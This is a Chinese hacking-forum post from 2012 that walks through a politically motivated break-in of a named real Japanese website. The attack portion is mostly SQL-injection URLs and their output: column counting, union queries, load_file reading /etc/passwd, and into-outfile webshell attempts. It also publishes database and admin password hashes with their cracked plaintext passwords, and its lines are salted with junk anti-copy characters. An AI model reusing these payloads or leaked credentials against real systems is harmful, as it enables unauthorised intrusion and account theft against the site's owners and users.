找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3419|回复: 1
打印 上一主题 下一主题

原创 检测汉奸站全过程

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-17 16:22:02 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
补:www.zuaa.jp测试
7 p5 R/ T. a4 {+ |. q; v" f

. a8 v* ~& T$ Y  s0 k0x01. 检测 www.zuaa.jp 收集数据, K6 |2 R9 |8 k2 a1 d7 r, }
) S7 k3 k9 z/ A/ ]! r/ b

+ A$ W; l& N3 W4 R0 @6 p* M6 Bwhatweb
  I4 G% b4 e+ w1 m1 g" |% k
9 d2 b: o2 }6 a% U7 Y
( e* l3 J9 h" d1 i利用NMAP扫描$ |, i) t; e* ^) b, G' B

% e. q5 }+ ~3 v( q7 K3 r. w中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
7 I5 k9 v, G8 e& w; K0x02.找注入点
* ?$ o: T! t/ I找注入点:http://www.zuaa.jp/php/newsdetail.php?topic_id=390
+ E* \, l: V, v" q' b
8 _! M% U, T) M8 V  F$ j+ j' }
# U1 q& v# q# @0x03.order by
' L( \* V1 |' q5 f8 I3 P" {) N             http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 1
( d. I5 P2 _' k! P' X' f
3 H$ E) \$ T+ J- S2 _) Jorder by 28报错,order by 27正常
1 g) a3 @# X3 N5 n/ i
' b& l+ p& S! S0 O( p  N* c0x04.   union手动查询
8 d; e1 g/ M/ u1 o0 ^9 h3 F$ S: ahttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 $ Z% W2 w3 G5 {7 V% N  ~% p
添加到 27 时正常显示 7 T5 L) D) H5 W5 _

4 R+ x4 E3 Y3 l# p4 s7 J- O中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
1 A' i! z2 e( g# p5 T) P4 `  o. e4 T. [" ^4 B8 M
0x05. info:
. `# z  E. I$ U$ Z. w( Yhttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
: c* J/ q5 n% t' m9 O. D5 N& \1 g
' e2 P4 }6 L% [5 v8 Y3 k' X2 ?user:            root@localhost2 L+ G# H! |( a# d8 A  s; u5 a: o
database:    openpne
) H! t# M' ]2 C9 i3 \6 _version:      4.1.22- ]3 p! k6 N1 O
os:             portbld-freebsd5.4% _4 Z( q* E8 C" R; `7 i6 _

" s$ ~8 C; T3 t7 ~& I  r8 p" g0x06. root用户2 j$ `/ D. t8 u! y8 v
利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的(这种方法, 可以过大多数站)
, w3 C' D7 V/ n0 w6 rhttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 1 ^: v$ H3 {3 \4 x; k

7 R( e3 ^7 Q, m1 D9 C8 q通过工具转换
6 i" n  f1 B1 b* q
2 S. v+ T' Q4 e, }中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
. d- A! l4 q5 M7 {+ V
* d! S: H) F4 L) n6 R0x07. 利用 into outfile
2 M5 x! b* I8 I: c全部都失败
* {2 t" o' W; C: Ihttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php
6 x8 q  C0 a* M+ c- g# M
4 x+ v; L$ h5 x( d# Chttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php
9 Q$ Y8 i; k8 a. W" u' g0 |8 F# }& q: U
页面显示“MDB2 Error:syntax error”
" J: b$ J" O) j; B+ m) ^. O3 K+ y
2 z, K# P( {1 G0x08. 利用 mysql 4.16 O$ a6 A0 b6 R8 x+ V+ e% I
猜常规表名,字段未果 工具 sqlmap
) C% ~! E. h& [3 Q中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持, j8 h. D+ g! c: e
& {& d) H! |7 }# M2 D+ t
$ b  o) [4 U- `) D

/ u3 P# v' g; P9 F0x09. 查找后台. g9 p1 s2 u0 x
利用 现有的各种 后台工具尝试都不行
: \  H) @: w( r$ |$ @  }% w1 P& Y" w
0x10.  MySL外联方法0 h. |  F6 _3 w  B. P* K$ s
从前面 nmap 收集的信息当中,可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码,然后再通过 mysql 工具外连 www.zuaa.jp 不行
4 U, Z( Z$ v& g# P# d4 t. n可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user% L7 v- h0 r: U2 T( q" e
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user$ S6 {* n3 n5 e- Q

  P: V" b4 j& f0 ^1 g# M这个可以在 www.cmd5.com 解密
& _- [/ n! s0 O/ e9 R' }2 _" Kroot:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009
& q7 Y7 S2 M# V" Fchen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97
( N1 y  B2 }4 R+ o, C; S% a* u( kopenpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???
0 e+ G2 e1 ]% u5 m0 a. Y$ ?3 wzuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???
" i* m  C  V. R+ Y4 t3 w2 |工具外连失败,据说防火墙策略只允许特定IP外连,具体不得知# ?, z$ o& Z1 u! S! `- r2 e

6 x3 \2 g' J* U7 h! ^- r9 t) d
4 r5 X5 m1 f- E! V5 a+ y, h0x11. 网站突破4 z; u/ q4 }7 b# ^- v/ `: @
发现网站的源程序 openpne, google 下载 openpne 源码2 y- h6 E( F7 H! `7 t6 G% I

! M' g2 R- q4 g5 U9 G2 ~: d) J) F% l4 Z, K2 I9 b7 F: n6 [3 X; u$ }
0x12. 默认信息利用$ |, Z) W6 ]& |) d1 r% C1 s
http://sns.zuaa.jp/?m=admin&a=page_login/ C  \) X& @; ?, L* ]+ O; J' H
& ]* K' O. o6 V% ~# W7 ?4 \7 V
表名 (c_admin_user) ,字段名(username,password)
" Y% _. j! C5 q" I8 c' q+ Z! ~http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user/ ^* v5 w0 j# \7 D/ u; o& Z
0 W) W0 s# D8 g, D( ^
解密
. p, {0 g7 L2 Lzuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda,               zuaa2009& h  |8 J3 q/ {
zuaajp:c0923ec5857796a393da99905008c176,          zju1897: |% G7 V% w6 r# P: B
* X8 B- w0 R1 }3 h
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
3 O3 `, R. ^9 d
' L7 E: \# r& |/ n0 U0x13. 登录后台# v: f  q' q/ y/ K* {4 @

3 F8 w, p, b+ d$ `, w; t$ m/ T  m- R) s0 N
4 }" Z8 x1 ]# I0 S
0x14. 小结  F9 L% Y4 \" k2 _+ L- E* u+ _
利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 。& @' N6 X% Z/ y- W
感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点. v& v& x: `3 b7 I' I4 m
------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain4 _# S: R' _) B
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持! j8 r- K" p( A
- b8 |- |# v' X( O3 I
最后声明:本人只负责了整理上传到论坛,让大家学习,不是原作者,原作者辛苦了!
" c2 `9 D6 {. k# }6 ]

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

沙发
发表于 2012-9-19 08:27:03 | 只看该作者
哪个牛人 费的这劲 入侵的
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表